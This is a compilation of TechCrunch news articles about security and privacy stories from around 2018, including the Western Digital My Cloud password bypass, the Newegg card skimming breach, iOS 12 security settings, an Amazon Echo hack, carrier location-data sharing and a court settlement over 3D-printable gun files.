Password bypass flaw in Western Digital My Cloud drives puts data at risk

Password bypass flaw in Western Digital My Cloud drives puts data at risk
A security researcher has published details of a vulnerability in a popular cloud storage drive after the company failed to issue security patches for over a year.
Remco Vermeulen found a privilege escalation bug in Western Digital’s My Cloud devices, which he said allows an attacker to bypass the admin password on the drive, gaining “complete control” over the user’s data.
The exploit works because drive’s web-based dashboard doesn’t properly check a user’s credentials before giving a possible attacker access to tools that should require higher levels of access.
The bug was “easy” to exploit, Vermeulen told TechCrunch in an email, and was remotely exploitable if a My Cloud device allows remote access over the internet — which thousands of devices do. He posted a proof-of-concept video on Twitter.
Details of the bug were also independently found by another security team, which released its own exploit code.
Vermeulen reported the bug over a year ago, in April 2017, but said the company stopped responding. Normally, security researchers give 90 days for a company to respond, in line with industry-accepted responsible disclosure guidelines.
After he found that WD updated the My Cloud firmware in the meanwhile without fixing the vulnerability he found, he decided to post his findings.
A year later, WD still hasn’t released a patch.
The company confirmed that it knows of the vulnerability but did not say why it took more than a year to issue a fix. “We are in the process of finalizing a scheduled firmware update that will resolve the reported issue,” a spokesperson said, which will arrive “within a few weeks.”
WD said that several of its My Cloud products are vulnerable — including the EX2, EX4 and Mirror, but not My Cloud Home.
In the meantime, Vermeulen said that there’s no fix and that users have to “just disconnect” the drive altogether if they want to keep their data safe.

Source: Gadgets – techcrunch

Hackers stole customer credit cards in Newegg data breach

Hackers stole customer credit cards in Newegg data breach
Newegg is clearing up its website after a month-long data breach.
Hackers injected 15 lines of card skimming code on the online retailer’s payments page which remained for more than a month between August 14 and September 18, Yonathan Klijnsma, a threat researcher at RiskIQ, told TechCrunch. The code siphoned off credit card data from unsuspecting customers to a server controlled by the hackers with a similar domain name — likely to avoid detection. The server even used an HTTPS certificate to blend in.
The code also worked for both desktop and mobile customers — though it’s unclear if mobile customers are affected.
The online electronics retailer removed the code on Tuesday after it was contacted by incident response firm Volexity, which first discovered the card skimming malware and reported its findings.
Newegg is one of the largest retailers in the US, making $2.65 billion in revenue in 2016. The company touts more than 45 million monthly unique visitors, but it’s not known precisely how many customers completed transactions during the period.
In an email to customers, Newegg chief executive Danny Lee said the company has “not yet determined which customer accounts may have been affected.” When reached, a Newegg spokesperson did not immediately comment.
Klijnsma called the incident “another well-disguised attack” that looked near-identical to the recent British Airways credit card breach, and earlier, the Ticketmaster breach. Like that breach, RiskIQ attributed the Newegg credit card theft to the Magecart group, a collective of hackers that carry out targeted attacks against vulnerable websites.
The code used in both skimming attacks was near identical, according to the research.
“The breach of Newegg shows the true extent of Magecart operators’ reach,” said Klijnsma. “These attacks are not confined to certain geolocations or specific industries—any organization that processes payments online is a target.”
Like previous card skimming campaigns, he said that the hackers “integrated with the victim’s payment system and blended with the infrastructure and stayed there as long as possible.”
Anyone who entered their credit card data during the period should immediately contact their banks.

British Airways breach caused by credit card skimming malware, researchers say

Source: Gadgets – techcrunch

Five security settings in iOS 12 you should change right now

Five security settings in iOS 12 you should change right now

iOS 12, Apple’s latest mobile software for iPhone and iPad, is finally out. The new software packs in a bunch of new security and privacy features you’ve probably already heard about.

Here’s what you need to do to take advantage of the new settings and lock down your device.

1. Turn on USB Restricted Mode to make hacking more difficult

This difficult-to-find new feature prevents any accessories from connecting to your device — like USB cables and headphones — when your iPhone or iPad has been locked for more than an hour. That prevents police and hackers alike from using tools to bypass your lock screen passcode and get your data.

Go to Settings > Touch ID & Passcode and type in your passcode. Then, scroll down and ensure that USB Accessories are not permitted on the lock screen, so make sure the setting is Off. (On an iPhone X, check your Face ID settings instead.)

2. Make sure automatic iOS updates are turned on

Every time your iPhone or iPad updates, it comes with a slew of security patches to prevent crashes or data theft. Yet, how often do you update your phone? Most don’t bother unless it’s a major update. Now, iOS 12 will update your device behind the scenes, saving you downtime. Just make sure you switch it on.

Go to Settings > General > Software Update and turn on automatic updates.

3. Set a stronger device passcode

iOS has gotten better in recent years with passcodes. For years, it was a four-digit code by default, and now it’s six-digits. That makes it far more difficult to run through every combination — known as brute-forcing.

But did you know that you can set a number-only code of any length? Eight-digits, twelve — even more — and it keeps the number keypad on the lock screen so you don’t have to fiddle around with the keyboard.

Go to Settings > Touch ID & Passcode and enter your passcode. Then, go to Change password and, from the options, set a Custom Numeric Code.

4. Now, switch on two-factor authentication

Two-factor is one of the best ways to keep your account safe. If someone steals your password, they still need your phone to break into your account. For years, two-factor has been cumbersome and annoying. Now, iOS 12 has a new feature that auto-fills the code, so it takes the frustration step out of the equation — so you have no excuse.

You may be asked to switch on two-factor when you set up your phone. You can also go to Settings and tap your name, then go to Password & Security. Just tap Turn on Two-Factor Authentication and follow the prompts.

5. While you’re here… change your reused passwords

iOS 12’s password manager has a new feature: password auditing. If it finds you’ve used the same password on multiple sites, it will warn you and advise you to change those passwords. It prevents password reuse attacks (known as “credential stuffing“) that hackers use to break into multiple sites and services using the same username and password.

Go to Settings > Passwords & Accounts > Website & App Passwords and enter your passcode. You’ll see a small warning symbol next to each account that recognizes a reused password. One tap of the Change Password on Website button and you’re done.

Source: Mobile – Techcruch

Security researchers found a way to hack into the Amazon Echo

Security researchers found a way to hack into the Amazon Echo
Hackers at DefCon have exposed new security concerns around smart speakers. Tencent’s Wu HuiYu and Qian Wenxiang spoke at the security conference with a presentation called Breaking Smart Speakers: We are Listening to You, explaining how they hacked into an Amazon Echo speaker and turned it into a spy bug.
The hack involved a modified Amazon Echo, which had parts swapped out, including some that had been soldered on. The modified Echo was then used to hack into other, non-modified Echos by connecting both the hackers’ Echo and a regular Echo to the same LAN.
This allowed the hackers to turn their own, modified Echo into a listening bug, relaying audio from the other Echo speakers without those speakers indicating that they were transmitting.
This method was very difficult to execute, but represents an early step in exploiting Amazon’s increasingly popular smart speaker.
The researchers notified Amazon of the exploit before the presentation, and Amazon has already pushed a patch, according to Wired.
Still, the presentation demonstrates how one Echo, with malicious firmware, could potentially alter a group of speakers when connected to the same network, posing concerns with the idea of Echos in hotels.
Wired explained how the networking feature of the Echo allowed for the hack:
If they can then get that doctored Echo onto the same Wi-Fi network as a target device, the hackers can take advantage of a software component of Amazon’s speakers, known as Whole Home Audio Daemon, that the devices use to communicate with other Echoes in the same network. That daemon contained a vulnerability that the hackers found they could exploit via their hacked Echo to gain full control over the target speaker, including the ability to make the Echo play any sound they chose, or more worryingly, silently record and transmit audio to a faraway spy.
An Amazon spokesperson told Wired that “customers do not need to take any action as their devices have been automatically updated with security fixes,” adding that “this issue would have required a malicious actor to have physical access to a device and the ability to modify the device hardware.”
To be clear, the actor would only need physical access to their own Echo to execute the hack.
While Amazon has dismissed concerns that its voice activated devices are monitoring you, hackers at this year’s DefCon proved that they can.

Source: Gadgets – techcrunch

Dixons Carphone says millions more customers affected by 2017 breach

Dixons Carphone says millions more customers affected by 2017 breach
A Dixons Carphone data breach that was disclosed earlier this summer was worse than initially reported. The company is now saying that personal data of 10 million customers could also have been accessed when its systems were hacked.
The European electronics and telecoms retailer believes its systems were accessed by unknown and unauthorized person/s in 2017, although it only disclosed the breach in June, after discovering it during a review of its security systems.
Last month it said 5.9M payment cards and 1.2M customer records had been accessed. But with its investigation into the breach “nearing completion”, it now says approximately 10M records containing personal data (but no financial information) may have been accessed last year — in addition to the 5.9M compromised payment cards it disclosed last month.
“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated,” the company said in a statement.
In terms of what personal data the 10M records contained, a Dixons Carphone spokeswoman told us: “This continues to relate to personal data, and the types of data that may have been accessed are, for example, name, address or email address.”
The company says it’s taking the precaution of contacting all its customers — to apologize and advise them of “protective steps to minimize the risk of fraud”.
It adds it has no evidence that the unauthorized access is continuing, having taken steps to secure its systems when the breach was discovered last month, saying: “We continue to make improvements and investments at pace to our security environment through enhanced controls, monitoring and testing.”
Commenting in a statement, Dixons Carphone CEO, Alex Baldock, added: “Since our data security review uncovered last year’s breach, we’ve been working around the clock to put it right. That’s included closing off the unauthorised access, adding new security measures and launching an immediate investigation, which has allowed us to build a fuller understanding of the incident that we’re updating on today.
“Again, we’re disappointed in having fallen short here, and very sorry for any distress we’ve caused our customers. I want to assure them that we remain fully committed to making their personal data safe with us.”
Back in 2015, Carphone Warehouse, a mobile division of Dixons Carphone, also suffered a hack which affected around 3M people. And in January the company was fined £400k by the ICO as a consequence of that earlier breach.
Since then new European Union regulations (GDPR) have come into force which greatly raise the maximum penalties which regulators can impose for serious data breaches.
Last month, following Dixon’s disclosure of the latest breach, the UK’s data watchdog, the ICO, told us it was liaising with the National Cyber Security Centre, the Financial Conduct Authority and other relevant agencies to ascertain the details and impact on customers.
Of the 5.9M payment cards which Dixons disclosed last month as having been compromised, it said the vast majority had been protected by chip and PIN technology. But around 105,000 lacked the security tech so Dixons said at the time could therefore have been compromised.
It’s the additional 1.2M records containing non-financial personal data — such as name, address or email address — that have been revised upwards now, to ~10M records, which constitutes almost half the Group’s customer base in the UK and Ireland.
The spokeswoman told us the Group has approximately 22M customers in the region.
https://www.ncsc.gov.uk/guidance/ncsc-advice-dixons-carphone-plc-customers

Source: Gadgets – techcrunch

Instagram is building non-SMS 2-factor auth to thwart SIM hackers

Instagram is building non-SMS 2-factor auth to thwart SIM hackers

Hackers can steal your phone number by reassigning it to a different SIM card, use it to reset your passwords, steal your Instagram and other accounts and sell them for bitcoin. As detailed in a harrowing Motherboard article today, Instagram accounts are especially vulnerable because the app only offers two-factor authentication through SMS that delivers a password reset or login code via text message.

But now Instagram has confirmed to TechCrunch that it’s building a non-SMS two-factor authentication system that works with security apps like Google Authenticator or Duo. They generate a special code that you need to log in that can’t be generated on a different phone in case your number is ported to a hacker’s SIM card.

Buried in the Instagram Android app’s APK code is a prototype of the upgraded 2FA feature, discovered by frequent TechCrunch tipster Jane Manchun Wong. Her work has led to confirmed TechCrunch scoops on Instagram Video Calling, Usage Insights, soundtracks for Stories and more.

When presented with the screenshots, an Instagram spokesperson told TechCrunch that yes, it is working on the non-SMS 2FA feature, saying, “We’re continuing to improve the security of Instagram accounts, including strengthening 2-factor authentication.”

Instagram actually lacked any two-factor protection until 2016 when it already had 400 million users. In November 2015, I wrote a story titled “Seriously. Instagram Needs Two-Factor Authentication.” A friend and star Instagram stop-motion animation creator Rachel Ryle had been hacked, costing a lucrative sponsorship deal. The company listened. Three months later, the app began rolling out basic SMS-based 2FA.

But since then, SIM porting has become a much more common problem. Hackers typically call a mobile carrier and use social engineering tactics to convince them they’re you, or bribe an employee to help, and then change your number to a SIM card they control. Whether they’re hoping to steal intimate photos, empty cryptocurrency wallets or sell desirable social media handles like @t or @Rainbow as Motherboard reported, there are plenty of incentives to try a SIM porting attack. This article outlines how you can take steps to protect your phone number.

Hopefully as knowledge of this hacking technique becomes more well-known, more apps will introduce non-SMS 2FA, mobile providers will make it tougher to port numbers and users will take more steps to safeguard their accounts. As our identities and assets increasingly go digital, it’s pin codes and authenticator apps, not just deadbolts and home security systems, that must become a part of our everyday lives.

Source: Mobile – Techcruch

Court victory legalizes 3D-printable gun blueprints

Court victory legalizes 3D-printable gun blueprints
A multi-year legal battle over the ability to distribute computer models of gun parts and replicate them in 3D printers has ended in defeat for government authorities who sought to prevent the practice. Cody Wilson, the gunmaker and free speech advocate behind the lawsuit, now intends to expand his operations, providing printable gun blueprints to all who desire them.
The longer story of the lawsuit is well told by Andy Greenberg over at Wired, but the decision is eloquent on its own. The fundamental question is whether making 3D models of gun components available online is covered by the free speech rights granted by the First Amendment.
This is a timely but complex conflict because it touches on two themes that happen to be, for many, ethically contradictory. Arguments for tighter restrictions on firearms are, in this case, directly opposed to arguments for the unfettered exchange of information on the internet. It’s hard to advocate for both here: restricting firearms and restricting free speech are one and the same.
That at least seems to be conclusion of the government lawyers, who settled Wilson’s lawsuit after years of court battles. In a copy of the settlement provided to me by Wilson, the U.S. government agrees to exempt “the technical data that is the subject of the Action” from legal restriction. The modified rules should appear in the Federal Register soon.
What does this mean? It means that a 3D model that can be used to print the components of a working firearm is legal to own and legal to distribute. You can likely even print it and use the product — you just can’t sell it. There are technicalities to the law here (certain parts are restricted, but can be sold in an incomplete state, etc.), but the implications as regards the files themselves seems clear.
Wilson’s original vision, which he is now pursuing free of legal obstacles, is a repository of gun models, called DEFCAD, much like any other collection of data on the web, though naturally considerably more dangerous and controversial.
“I currently have no national legal barriers to continue or expand DEFCAD,” he wrote in an email to TechCrunch. “This legal victory is the formal beginning to the era of downloadable guns. Guns are as downloadable as music. There will be streaming services for semi-automatics.”
The concepts don’t map perfectly, no doubt, but it’s hard to deny that with the success of this lawsuit, there are few legal restrictions to speak of on the digital distribution of firearms. Before it even, there were few technical restrictions: certainly just as you could download MP3s on Napster in 2002, you can download a gun file today.
Gun control advocates will no doubt argue that greater availability of lethal weaponry is the opposite of what is needed in this country. But others will point out that in a way this is a powerful example of how liberally free speech can be defined. It’s important to note that both of these things can be true.
This court victory settles one case, but marks the beginnings of many another. “I have promoted my values for years with great care and diligence,” Wilson wrote. It’s hard to disagree with that. Those whose values differ are free to pursue them in their own way; perhaps they too will be awarded victories of this scale.

Source: Gadgets – techcrunch

Apple releases new iPad, FaceID ads

Apple releases new iPad, FaceID ads
Apple has released a handful of new ads promoting the iPad’s portability and convenience over both laptops and traditional paper solutions. The 15-second ads focus on how the iPad can make even the most tedious things — travel, notes, paperwork, and ‘stuff’ — just a bit easier.
Three out of the four spots show the sixth-generation iPad, which was revealed at Apple’s education event in March, and which offers a lower-cost ($329 in the U.S.) option with Pencil support.
The ads were released on Apple’s international YouTube channels (UAE, Singapore, and United Kingdom).

This follows another 90-second ad released yesterday, focusing on FaceID. The commercial shows a man in a gameshow-type setting asked to remember the banking password he created earlier that morning. He struggles for an excruciating amount of time before realizing he can access the banking app via FaceID.

There has been some speculation that FaceID may be incorporated into some upcoming models of the iPad, though we’ll have to wait until Apple’s next event (likely in September) to find out for sure.

Source: Gadgets – techcrunch

Verizon and others call a conditional halt on sharing location with data brokers

Verizon and others call a conditional halt on sharing location with data brokers

Verizon is cutting off access to its mobile customers’ real-time locations to two third-party data brokers “to prevent misuse of that information going forward.” The company announced the decision in a letter sent to Senator Ron Wyden (D-OR), who along with others helped reveal improper usage and poor security at these location brokers. It is not, however, getting out of the location-sharing business altogether.

(Update: AT&T and Sprint have also begun the process of ending their location aggregation services — with a caveat, of which below.)

Verizon sold bulk access to its customers’ locations to the brokers in question, LocationSmart and Zumigo, which then turned around and resold that data to dozens of other companies. This isn’t necessarily bad — there are tons of times when location is necessary to provide a service the customer asks for, and supposedly that customer would have to okay the sharing of that data. (Disclosure: Verizon owns Oath, which owns TechCrunch. This does not affect our coverage.)

That doesn’t seem to have been the case at LocationSmart customer Securus, which was selling its data directly to law enforcement so they could find mobile customers quickly and without all that fuss about paperwork and warrants. And then it was found that LocationSmart had exposed an API that allowed anyone to request mobile locations freely and anonymously, and without collecting consent.

When these facts were revealed by security researchers and Sen. Wyden, Verizon immediately looked into it, they reported in a letter sent to the Senator.

“We conducted a comprehensive review of our location aggregator program,” wrote Verizon CTO Karen Zacharia. “As a result of this review, we are initiating a process to terminate our existing agreements for the location aggregator program.”

“We will not enter into new location aggregation arrangements unless and until we are comfortable that we can adequately protect our customers’ location data through technological advancements and/or other practices,” she wrote later in the letter. In other words, the program is on ice until it can be secured.

Although Verizon claims to have “girded” the system with “mechanisms designed to protect against misuse of our customers’ location data,” the abuses in question clearly slipped through the cracks. Perhaps most notable is the simple fact that Verizon itself does not seem to need to be informed whether a customer has consented to having their location polled. That collection is the responsibility of “the aggregator or corporate customer.”

In other words, Verizon doesn’t need to ask the customer, and the company it sells the data to wholesale doesn’t need to ask the customer — the requirement devolves to the company buying access from the wholesaler. In Securus’s case, it had abstracted things one step further, allowing law enforcement full access when it said it had authority to do so, but apparently without checking, AT&T wrote in its own letter to Sen. Wyden.

And there were 75 other corporate customers. Don’t worry, someone is keeping track of them. Right?

These processes are audited, Verizon wrote, but apparently not an audit that finds things like the abuse by Securus or a poorly secured API. Perhaps how this happened is among the “number of internal questions” raised by the review.

When asked for comment, a Verizon representative offered the following statement:

When these issues were brought to our attention, we took immediate steps to stop it. Customer privacy and security remain a top priority for our customers and our company. We stand-by that commitment to our customers.

And indeed while the program itself appears to have been run with a laxity that should be alarming to all those customers for whom Verizon claims to be so concerned, some of the company’s competitors have yet to take similar action. AT&T, T-Mobile and Sprint were also named by LocationSmart as partners. Their own letters to Sen. Wyden stressed that their systems were similar to the others, with similar safeguards (that were similarly eluded).

In a press release announcing that his pressure on Verizon had borne fruit, Sen. Wyden called on the others to step up:

Verizon deserves credit for taking quick action to protect its customers’ privacy and security. After my investigation and follow-up reports revealed that middlemen are selling Americans’ location to the highest bidder without their consent, or making it available on insecure web portals, Verizon did the responsible thing and promptly announced it was cutting these companies off. In contrast, AT&T, T-Mobile, and Sprint seem content to continuing to sell their customers’ private information to these shady middle men, Americans’ privacy be damned.

AT&T actually announced that it is ending its agreements as well, after Sen. Wyden’s call to action was published, and Sprint followed shortly afterwards. AT&T said it “will be ending [its] work with these aggregators for these services as soon as is practical in a way that preserves important, potential lifesaving services like emergency roadside assistance.” Sprint stopped working with LocationSmart last month and is now “beginning the process of terminating its current contracts with data aggregators to whom we provide location data.”

What’s missing from these statements? Among other things: what and how many companies they’re working with, whether they’ll pursue future contracts, and what real changes will be made to prevent future problems like this. Since they’ve been at this for a long time and have had a month to ponder their next course of actions, I don’t think it’s unreasonable to expect more than a carefully worded statement about “these aggregators for these services.”

T-Mobile CEO John Legere tweeted that the company “will not sell customer location data to shady middlemen.” Of course, that doesn’t really mean anything. I await substantive promises from the company pertaining to this “pledge.”

The FCC, meanwhile, has announced that it is looking into the issue — with the considerable handicap that Chairman Ajit Pai represented Securus back in 2012 when he was working as a lawyer. Sen. Wyden has called on him to recuse himself, but that has yet to happen.

I’ve asked Verizon for further clarification on its arrangements and plans, specifically whether it has any other location-sharing agreements in place with other companies. These aren’t, after all, the only players in the game.

Source: Mobile – Techcruch

Purdue’s PHADE technology lets cameras ‘talk’ to you

Purdue’s PHADE technology lets cameras ‘talk’ to you
It’s become almost second nature to accept that cameras everywhere — from streets, to museums and shops — are watching you, but now they may be able to communicate with you, as well. New technology from Purdue University computer science researchers has made this dystopian prospect a reality in a new paper published today. But, they argue, it’s safer than you might think.
The system is called PHADE, which allows for something called “private human addressing,” where camera systems and individual cell phones can communicate without transmitting any personal data, like an IP or Mac address. Instead of using an IP or Mac address, the technology relies on motion patterns for the address code. That way, even if a hacker intercepts it, they won’t be able to access the person’s physical location.
Imagine you’re strolling through a museum and an unfamiliar painting catches your eye. The docents are busy with a tour group far across the gallery and you didn’t pay extra for the clunky recorder and headphones for an audio tour. While pondering the brushwork you feel your phone buzz, and suddenly a detailed description of the artwork and its painter is in the palm of your hand.
To achieve this effect, researchers use an approach similar to the kind of directional audio experience you might find at theme parks. Through processing the live video data, the technology is able to identify the individual motion patterns of pedestrians and when they are within a pertinent range — say, in front of a painting. From there they can broadcast a packet of information linked to the motion address of the pedestrian. When the user’s phone identifies that the motion address matches their own, the message is received.
While this tech can be used to better inform the casual museum-goer, the researchers also believe it has a role in protecting pedestrians from crime in their area.
“Our system serves as a bridge to connect surveillance cameras and people,” He Wang, a co-creator of the technology and assistant professor of computer science, said in a statement. “[It can] be used by government agencies to enhance public safety [by deploying] cameras in high-crime or high-accident areas and warn[ing] specific users about potential threats, such as suspicious followers.”
While the benefits of an increasingly interconnected world are still being debated and critiqued daily, there might just be an upside to knowing a camera’s got its eye on you.

Source: Gadgets – techcrunch